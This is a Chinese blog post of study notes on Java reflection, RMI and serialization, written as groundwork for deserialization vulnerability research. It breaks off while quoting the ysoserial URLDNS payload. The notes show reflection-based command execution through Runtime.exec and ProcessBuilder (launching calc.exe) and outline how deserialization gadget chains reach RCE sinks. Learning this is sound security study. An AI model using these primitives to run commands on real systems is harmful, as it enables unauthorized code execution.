

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=dark>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/myavatar.jpg">
  <link rel="icon" href="/img/myavatar.jpg">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="5i1encee">
  <meta name="keywords" content="">
  
    <meta name="description" content="emmm加油更新">
<meta property="og:type" content="article">
<meta property="og:title" content="java 基础知识笔记">
<meta property="og:url" content="http://5i1encee.top/2025/10/20/java%E5%9F%BA%E7%A1%80%E7%9F%A5%E8%AF%86%E7%AC%94%E8%AE%B0/index.html">
<meta property="og:site_name" content="5i1encee&#39;s Blog">
<meta property="og:description" content="emmm加油更新">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://5i1encee.top/img/java%E5%9F%BA%E7%A1%80%E7%9F%A5%E8%AF%86%E7%AC%94%E8%AE%B0/3703E54ABDAC5426C66722548CA800D6.jpg">
<meta property="article:published_time" content="2025-10-20T05:56:07.000Z">
<meta property="article:modified_time" content="2025-10-20T06:49:35.921Z">
<meta property="article:author" content="5i1encee">
<meta property="article:tag" content="web">
<meta property="article:tag" content="反序列化">
<meta property="article:tag" content="java">
<meta property="article:tag" content="反射">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="http://5i1encee.top/img/java%E5%9F%BA%E7%A1%80%E7%9F%A5%E8%AF%86%E7%AC%94%E8%AE%B0/3703E54ABDAC5426C66722548CA800D6.jpg">
  
  
  
  <title>java 基础知识笔记 - 5i1encee&#39;s Blog</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_hj8rtnfg7um.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"5i1encee.top","root":"/","version":"1.9.7","typing":{"enable":true,"typeSpeed":60,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":true,"follow_dnt":true,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":"jjGGn76maTdishPRDEFNvls9-gzGzoHsz","app_key":"FJ9un1wEMLCu0LBShqweCwNF","server_url":"https://jjggn76m.lc-cn-n1-shared.com","path":"window.location.pathname","ignore_local":false}},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  

  

  
    <!-- Google tag (gtag.js) -->
    <script async>
      if (!Fluid.ctx.dnt) {
        Fluid.utils.createScript("https://www.googletagmanager.com/gtag/js?id=", function() {
          window.dataLayer = window.dataLayer || [];
          function gtag() {
            dataLayer.push(arguments);
          }
          gtag('js', new Date());
          gtag('config', '');
        });
      }
    </script>
  

  

  

  

  
    
  



  
<meta name="generator" content="Hexo 7.2.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>5i1encee</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/" target="_self">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/" target="_self">
                <i class="iconfont icon-category-fill"></i>
                <span>分类</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/" target="_self">
                <i class="iconfont icon-tags-fill"></i>
                <span>标签</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/links/" target="_self">
                <i class="iconfont icon-link-fill"></i>
                <span>友链</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/" target="_self">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/java%E5%9F%BA%E7%A1%80%E7%9F%A5%E8%AF%86%E7%AC%94%E8%AE%B0/3703E54ABDAC5426C66722548CA800D6.jpg') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="java 基础知识笔记"></span>
          
        </div>

        
          
  <div class="mt-3">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-author" aria-hidden="true"></i>
        5i1encee
      </span>
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2025-10-20 13:56" pubdate>
          2025年10月20日 下午
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          4k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          40 分钟
        
      </span>
    

    
    
      
        <span id="leancloud-page-views-container" class="post-meta" style="display: none">
          <i class="iconfont icon-eye" aria-hidden="true"></i>
          <span id="leancloud-page-views"></span> 次
        </span>
        
      
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">java 基础知识笔记</h1>
            
            
              <div class="markdown-body">
                
                <h1 id="java-基础知识笔记"><a href="#java-基础知识笔记" class="headerlink" title="java 基础知识笔记"></a>java 基础知识笔记</h1><h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><p>学习实践了一些 java 反序列化漏洞之后发现其实很多时候只是跟着别人复现了一遍，自己未必真的就能做什么东西出来，以培养自己独立代码审计、挖掘漏洞的能力为目标，恶补一些基础内容。</p>
<h1 id="反射"><a href="#反射" class="headerlink" title="反射"></a>反射</h1><blockquote>
<p>摘自 <a target="_blank" rel="noopener" href="https://withdong02.top/2025/08/10/Java%E5%8F%8D%E5%B0%84%E5%85%A5%E9%97%A8/">withdong02 的 java 反射入门</a>，先阅读一遍前置知识<br>编译器在编译 Java 源代码时会生成 <code>.class</code> 文件（字节码文件）。当 JVM 需要用到某个类时，它的类加载器会读取并解析对应的 <code>.class</code> 文件，在方法区（或元空间）构建该类的运行时数据结构，同时在堆内存中创建一个代表该类的 <code>java.lang.Class</code> 对象。每个被加载的类在 JVM 中都有且只有一个对应的 <code>Class</code> 对象（在同一个类加载器命名空间内）。<br>这里的 <code>Class</code> 是一个类的名字，不要和 <code>class</code> 关键字搞混。</p>
</blockquote>
<p>Class 对象是反射的基石，反射就是操作 Class。</p>
<p>“正射”即在了解一个类的情况下，把该类实例化为一个对象，随后对这个对象进行操作</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs java"><span class="hljs-type">Student</span> <span class="hljs-variable">student</span> <span class="hljs-operator">=</span> <span class="hljs-keyword">new</span> <span class="hljs-title class_">Student</span>();<br>student.doHomework(<span class="hljs-string">&quot;数学&quot;</span>)<br></code></pre></td></tr></table></figure>

<p>“反射”即在不了解所需的类的情况下，像镜子一般在运行过程中通过相应的 Class 类获取对象实例对应的类的完整构造并调用对应方法</p>
<figure class="highlight kotlin"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><code class="hljs kotlin"><span class="hljs-comment">//先获取所需类的Class对象实例</span><br><span class="hljs-comment">//forname方法通过类名获取相应的类</span><br>Class clazz = Class.forName(<span class="hljs-string">&quot;reflection.Student&quot;</span>);<br><span class="hljs-comment">//获取doHomework方法的Method对象</span><br><span class="hljs-comment">//getMethod通过反射获取一个类的某个特定public方法</span><br><span class="hljs-comment">//getMethod的两个参数分别为要调用的方法名，和该方法所需参数类型的Class对象（用于区分有重载的方法）</span><br>Method method = clazz.getMethod(<span class="hljs-string">&quot;doHomework&quot;</span>, String.<span class="hljs-keyword">class</span>);<br><span class="hljs-comment">//获取Constructor构造器对象</span><br><span class="hljs-comment">//getConstructor方法的参数取决于你拿到的构造器的参数</span><br>Constructor <span class="hljs-keyword">constructor</span> =clazz.getConstructor();<br><span class="hljs-comment">//用构造器创建反射类实例对象</span><br><span class="hljs-comment">//newInstance方法的作用就是调用类的无参构造函数创建一个该类的实例（必须要有公开的无参构造函数）</span><br>Object <span class="hljs-keyword">object</span> = <span class="hljs-keyword">constructor</span>.newInstance();<br><span class="hljs-comment">//传入参数，调用方法</span><br><span class="hljs-comment">//invoke的两个参数分别是用于调用方法的对象，和调用方法要传入的具体参数</span><br>method.invoke(<span class="hljs-keyword">object</span>, <span class="hljs-string">&quot;语文&quot;</span>);<br></code></pre></td></tr></table></figure>

<p>反射的应用主要在于实现动态性，在程序运行的过程中可以动态地创建、操作实例对象（获取类的信息、操作字段、操作方法、操作构造器）。</p>
<p><img src="/img/java%E5%9F%BA%E7%A1%80%E7%9F%A5%E8%AF%86%E7%AC%94%E8%AE%B0/JG1ebWTQaouHVexodSXcRZMWnqb.png" srcset="/img/loading.gif" lazyload></p>
<p>上面我们提到要调用 newInstance 方法必须要有公开的无参构造函数，而实际中就可能遇到其他情况</p>
<ol>
<li>该类的构造函数为私有的</li>
<li>该类没有无参构造函数</li>
</ol>
<div class="note note-warning">
            <p><strong>补充说明</strong>：<br>实际上，在 java9 及以后的版本中 clazz.newInstance()这种用法由于不安全性已被弃用，推荐使用的是 clazz.getConstructor().newInstance()，而这种用法可以根据传入的参数调用任意的构造方法，而不仅限于无参构造方法。getConstructor()的参数即为要获得的构造器的参数类型，newInstance()的参数即为要传入的具体参数。</p>
          </div>

<p>例如 java.lang.Runtime 的无参构造函数为私有，无法直接通过 clazz.newInstance()创建实例（尝试发现，在高版本使用 clazz.getDeclaredConstructor().newInstance()，并 setAccessible(true)也无法达到目的，似乎更严密的封装机制拒绝了外部类的访问）。那么为什么 Runtime 的无参构造函数要设为私有呢？实际上 Runtime 类采用的设计模式是“单例模式”：无参构造函数设为私有，但编写一个静态方法用来获取实例，只有在类初始化时静态方法会执行一次构造函数，从而达到控制类的实例数量仅有一个的目的。</p>
<p>那么该如何解决这一问题呢？查看 Runtime 类可以发现，该类通过静态方法 getRuntime 来获取 Runtime 实例，所以调用 getRuntime 即可：</p>
<p><img src="/img/java%E5%9F%BA%E7%A1%80%E7%9F%A5%E8%AF%86%E7%AC%94%E8%AE%B0/O8KZbeuv5oVJNCxhCuCc9nAFndf.png" srcset="/img/loading.gif" lazyload></p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs java"><span class="hljs-type">Class</span> <span class="hljs-variable">clazz</span> <span class="hljs-operator">=</span> Class.forName(<span class="hljs-string">&quot;java.lang.Runtime&quot;</span>); <br><span class="hljs-type">Method</span> <span class="hljs-variable">execMethod</span> <span class="hljs-operator">=</span> clazz.getMethod(<span class="hljs-string">&quot;exec&quot;</span>, String.class); <br><span class="hljs-type">Method</span> <span class="hljs-variable">getRuntimeMethod</span> <span class="hljs-operator">=</span> clazz.getMethod(<span class="hljs-string">&quot;getRuntime&quot;</span>); <span class="hljs-comment">//获取静态方法 getRuntime</span><br><span class="hljs-type">Object</span> <span class="hljs-variable">runtime</span> <span class="hljs-operator">=</span> getRuntimeMethod.invoke(clazz); <span class="hljs-comment">//利用静态方法getRuntime获取Runtime实例</span><br>execMethod.invoke(runtime, <span class="hljs-string">&quot;calc.exe&quot;</span>); <span class="hljs-comment">//调用exec方法利用得到的Runtime实例，传入参数执行命令</span><br></code></pre></td></tr></table></figure>

<p>以上的两个 invoke 使用略有不同，其第一个参数：</p>
<ol>
<li>如果这个方法是一个普通方法，那么第一个参数是类对象</li>
<li>如果这个方法是一个静态方法，那么第一个参数是类</li>
</ol>
<p><code>getRuntimeMethod.invoke(clazz)</code> 是静态方法调用那么第一个参数即该方法的类</p>
<p><code>execMethod.invoke(runtime, &quot;calc.exe&quot;)</code> 是普通方法调用那么第一个参数是该类的对象</p>
<hr>
<p>再比如另一种常用的执行命令方式 ProcessBuilder，它仅有两个含参构造函数</p>
<p><img src="/img/java%E5%9F%BA%E7%A1%80%E7%9F%A5%E8%AF%86%E7%AC%94%E8%AE%B0/Z3tLbMnmcoNRYSxRlFBcFEtRnRb.png" srcset="/img/loading.gif" lazyload></p>
<p>此处我们可以使用反射来获取其构造函数，然后调用 start()来执行命令。如下利用的是 ProcessBuilder(List<String> command)这一构造函数，传入 List<String>参数。start()方法的调用需要对象是 ProcessBuilder 所以必须进行强制类型转换，然而在利用漏洞的时候往往没有满足需求的上下文，所以这种方式并不好用。</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs java"><span class="hljs-type">Class</span> <span class="hljs-variable">clazz</span> <span class="hljs-operator">=</span> Class._forName_(<span class="hljs-string">&quot;java.lang.ProcessBuilder&quot;</span>);<br>((ProcessBuilder)clazz.getConstructor(List.class).newInstance(Arrays._asList_(<span class="hljs-string">&quot;calc.exe&quot;</span>))).start();<br></code></pre></td></tr></table></figure>

<p>所以可改为如下代码，getMethod(“start”)反射获取 start 方法，invoke 传参执行。</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs java"><span class="hljs-type">Class</span> <span class="hljs-variable">clazz</span> <span class="hljs-operator">=</span> Class.forName(<span class="hljs-string">&quot;java.lang.ProcessBuilder&quot;</span>);<br>clazz.getMethod(<span class="hljs-string">&quot;start&quot;</span>).invoke(clazz.getConstructor(List.class).newInstance(Arrays.asList(<span class="hljs-string">&quot;calc.exe&quot;</span>)));<br></code></pre></td></tr></table></figure>

<p>那么如果想要使用 ProcessBuilder(String… command)又该怎么写呢？</p>
<p>这里涉及到 Java 里的可变长参数，方法里的 <code>...</code> 表示“这个函数的参数个数是可变的”，Java 在编译时就会将此处处理为数组，也就等价为 ProcessBuilder(String[] command)，所以如下获取该构造函数即可</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs java"><span class="hljs-type">Class</span> <span class="hljs-variable">clazz</span> <span class="hljs-operator">=</span> Class.forName(<span class="hljs-string">&quot;java.lang.ProcessBuilder&quot;</span>);<br>clazz.getConstructor(String[].class)<br></code></pre></td></tr></table></figure>

<p>所以在调用 newInstance 时传给构造函数 ProcessBuilder(String[] command)的参数也同样使用数组，因为 newInstance 本身就需要数组参数，那么最终两者叠加就变成了一个二维数组</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs java"><span class="hljs-type">Class</span> <span class="hljs-variable">clazz</span> <span class="hljs-operator">=</span> Class.forName(<span class="hljs-string">&quot;java.lang.ProcessBuilder&quot;</span>);<br>clazz.getMethod(<span class="hljs-string">&quot;start&quot;</span>).invoke(clazz.getConstructor(String[].class).newInstance(<span class="hljs-keyword">new</span> <span class="hljs-title class_">String</span>[][]&#123;&#123;<span class="hljs-string">&quot;calc.exe&quot;</span>&#125;&#125;));<br></code></pre></td></tr></table></figure>

<h1 id="RMI"><a href="#RMI" class="headerlink" title="RMI"></a>RMI</h1><p>RMI 全称是 Remote Method Invocation，即远程方法调用，让某个 Java 虚拟机上的对象调用另一个 Java 虚拟机中对象的方法</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><code class="hljs java"><span class="hljs-keyword">package</span> rmi.example;<br><br><span class="hljs-keyword">import</span> java.rmi.Naming;<br><span class="hljs-keyword">import</span> java.rmi.Remote;<br><span class="hljs-keyword">import</span> java.rmi.RemoteException;<br><span class="hljs-keyword">import</span> java.rmi.registry.LocateRegistry;<br><span class="hljs-keyword">import</span> java.rmi.registry.Registry;<br><span class="hljs-keyword">import</span> java.rmi.server.UnicastRemoteObject;<br><br><span class="hljs-keyword">public</span> <span class="hljs-keyword">class</span> <span class="hljs-title class_">rmiServer</span> &#123;<br><br>    <span class="hljs-keyword">public</span> <span class="hljs-keyword">interface</span> <span class="hljs-title class_">IRemoteHelloWorld</span> <span class="hljs-keyword">extends</span> <span class="hljs-title class_">Remote</span> &#123;<br>        <span class="hljs-keyword">public</span> String <span class="hljs-title function_">hello</span><span class="hljs-params">()</span> <span class="hljs-keyword">throws</span> RemoteException;<br>    &#125;<br>    <span class="hljs-keyword">public</span> <span class="hljs-keyword">class</span> <span class="hljs-title class_">RemoteHelloWorld</span> <span class="hljs-keyword">extends</span> <span class="hljs-title class_">UnicastRemoteObject</span> <span class="hljs-keyword">implements</span><br>            <span class="hljs-title class_">IRemoteHelloWorld</span> &#123;<br>        <span class="hljs-keyword">protected</span> <span class="hljs-title function_">RemoteHelloWorld</span><span class="hljs-params">()</span> <span class="hljs-keyword">throws</span> RemoteException &#123;<br>            <span class="hljs-built_in">super</span>();<br>        &#125;<br>        <span class="hljs-keyword">public</span> String <span class="hljs-title function_">hello</span><span class="hljs-params">()</span> <span class="hljs-keyword">throws</span> RemoteException &#123;<br>            System._out_.println(<span class="hljs-string">&quot;call from&quot;</span>);<br>            <span class="hljs-keyword">return</span> <span class="hljs-string">&quot;Hello world&quot;</span>;<br>        &#125;<br>    &#125;<br>    <span class="hljs-keyword">private</span> <span class="hljs-keyword">void</span> <span class="hljs-title function_">start</span><span class="hljs-params">()</span> <span class="hljs-keyword">throws</span> Exception &#123;<br>        <span class="hljs-type">RemoteHelloWorld</span> <span class="hljs-variable">h</span> <span class="hljs-operator">=</span> <span class="hljs-keyword">new</span> <span class="hljs-title class_">RemoteHelloWorld</span>();<br>        LocateRegistry._createRegistry_(<span class="hljs-number">1099</span>);<br>        Naming._rebind_(<span class="hljs-string">&quot;rmi://127.0.0.1:1099/Hello&quot;</span>, h);<br>    &#125;<br>    <span class="hljs-keyword">public</span> <span class="hljs-keyword">static</span> <span class="hljs-keyword">void</span> <span class="hljs-title function_">main</span><span class="hljs-params">(String[] args)</span> <span class="hljs-keyword">throws</span> Exception &#123;<br>        <span class="hljs-keyword">new</span> <span class="hljs-title class_">rmiServer</span>().start();<br>    &#125;<br>&#125;<br></code></pre></td></tr></table></figure>

<p>一个 RMI Server 需要有三个部分：</p>
<ol>
<li>一个继承了 java.rmi.Remote 的接口，其中定义我们要远程调用的函数，比如这里的 hello()</li>
<li>一个实现了此接口的类</li>
<li>一个主类，用来创建 Registry，并将上面的类实例化后绑定到一个地址。这就是我们所谓的 Server 了。</li>
</ol>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><code class="hljs java"><span class="hljs-keyword">package</span> rmi.example;<br><br><span class="hljs-keyword">import</span> rmi.example.rmiServer;<br><span class="hljs-keyword">import</span> java.rmi.Naming;<br><span class="hljs-keyword">import</span> java.rmi.NotBoundException;<br><span class="hljs-keyword">import</span> java.rmi.RemoteException;<br><br><span class="hljs-keyword">public</span> <span class="hljs-keyword">class</span> <span class="hljs-title class_">rmiClient</span> &#123;<br>    <span class="hljs-keyword">public</span> <span class="hljs-keyword">static</span> <span class="hljs-keyword">void</span> <span class="hljs-title function_">main</span><span class="hljs-params">(String[] args)</span> <span class="hljs-keyword">throws</span> Exception &#123;<br>        rmiServer.<span class="hljs-type">IRemoteHelloWorld</span> <span class="hljs-variable">hello</span> <span class="hljs-operator">=</span> (rmiServer.IRemoteHelloWorld) Naming._lookup_(<span class="hljs-string">&quot;rmi://127.0.0.1:1099/Hello&quot;</span>);<br>        <span class="hljs-comment">// rmi Server IP</span><br>        <span class="hljs-type">String</span> <span class="hljs-variable">ret</span> <span class="hljs-operator">=</span> hello.hello();<br>        System._out_.println( ret);<br>    &#125;<br>&#125;<br></code></pre></td></tr></table></figure>

<p>一个 RMI Client 则只需要用 Naming.lookup 在 Registry 中寻找到名字是 Hello 的对象，而后正常使用即可。</p>
<p>一次完整 RMI 通信的流程大致为：Client 发起第一次 TCP 连接向远程 registry 发送一个 Call 请求查找名为 hello 的对象，远程 registry 返回一个 ReturnData 包含所需对象的序列化数据，Client 反序列化该数据得到所需（远程）对象，于是发起第二次 TCP 连接调用远程方法，远程方法实际在远程 Server 上执行。</p>
<p>那么 RMI 技术会带来什么安全问题呢？</p>
<p>RMI Registry 相当于一个提供远程对象管理服务的地方，最直接的考虑就是 registry 能否控制：实际上 Java 早对 RMI Registry 的做了访问限制，只有来自 localhost 时才能调用 rebind、bind、unbind 等方法，除此之外 list、lookup 可远程调用，分别用于列出目标上所有绑定的对象和获取某个远程对象。</p>
<p>（这里还有一个 Codebase 的利用内容，暂时略过）</p>
<h1 id="序列化与反序列化"><a href="#序列化与反序列化" class="headerlink" title="序列化与反序列化"></a>序列化与反序列化</h1><p>一些序列化和反序列化相关的特性如下：</p>
<ol>
<li>类实现了 <code>Serializable</code> 才能序列化</li>
</ol>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs java"><span class="hljs-keyword">public</span> <span class="hljs-keyword">class</span> <span class="hljs-title class_">Animal</span> <span class="hljs-keyword">implements</span> <span class="hljs-title class_">Serializable</span> &#123;...&#125;<br></code></pre></td></tr></table></figure>

<ol>
<li>如果要序列化的对象的父类没有实现序列化接口，那么在反序列化时会调用父类的无参构造方法，反序列化后的结果中父类的属性为 null</li>
<li>静态成员变量不能被序列化，序列化是针对对象属性的，而静态成员变量是属于类的。</li>
<li>transient 标识的对象成员变量不参与序列化</li>
<li>序列化与反序列化的形式可以有 json、xml、原生等</li>
<li>为满足特定需求，writeObject 和 readObject 都是可被重写的</li>
<li>当服务端反序列化时就会自动执行客户端传递的类的 readObject 代码，从而形成安全隐患</li>
</ol>
<figure class="highlight pgsql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><code class="hljs pgsql">可能的攻击情况<br><span class="hljs-number">1.</span>传递的入口类的readObject本身直接就会调用危险方法（基本无）<br><span class="hljs-number">2.</span>传递的入口类本身不调用危险方法，但参数中包含可控的类，该类有危险方法，在readObject处被调用<br><span class="hljs-number">3.</span>传递的入口类本身不调用危险方法，但参数中包含可控的类，该类可调用其他含危险方法的类<br><span class="hljs-number">4.</span>构造函数、静态代码块等在类加载过程中隐性执行<br><br>完整攻击满足<br><span class="hljs-number">1.</span>都继承<span class="hljs-keyword">Serializable</span><br><span class="hljs-number">2.</span>入口类source（满足：重写readObject，调用常见的函数，参数类型宽泛例如最后直接传递<span class="hljs-keyword">Object</span>，最好jdk自带）<br><span class="hljs-number">3.</span>调用链gadget chain (根据相同名称、相同类型)<br><span class="hljs-number">4.</span>执行类sink (rce、ssrf、写文件)<br></code></pre></td></tr></table></figure>

<hr>
<p>以 <a target="_blank" rel="noopener" href="https://github.com/frohoff/ysoserial/blob/master/src/main/java/ysoserial/payloads/URLDNS.java">ysoserial 里的 URLDNS 链</a>为例入门一下 java 的反序列漏洞原理：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br></pre></td><td class="code"><pre><code class="hljs java"><span class="hljs-keyword">package</span> ysoserial.payloads;<br><br><span class="hljs-keyword">import</span> java.io.IOException;<br><span class="hljs-keyword">import</span> java.net.InetAddress;<br><span class="hljs-keyword">import</span> java.net.URLConnection;<br><span class="hljs-keyword">import</span> java.net.URLStreamHandler;<br><span class="hljs-keyword">import</span> java.util.HashMap;<br><span class="hljs-keyword">import</span> 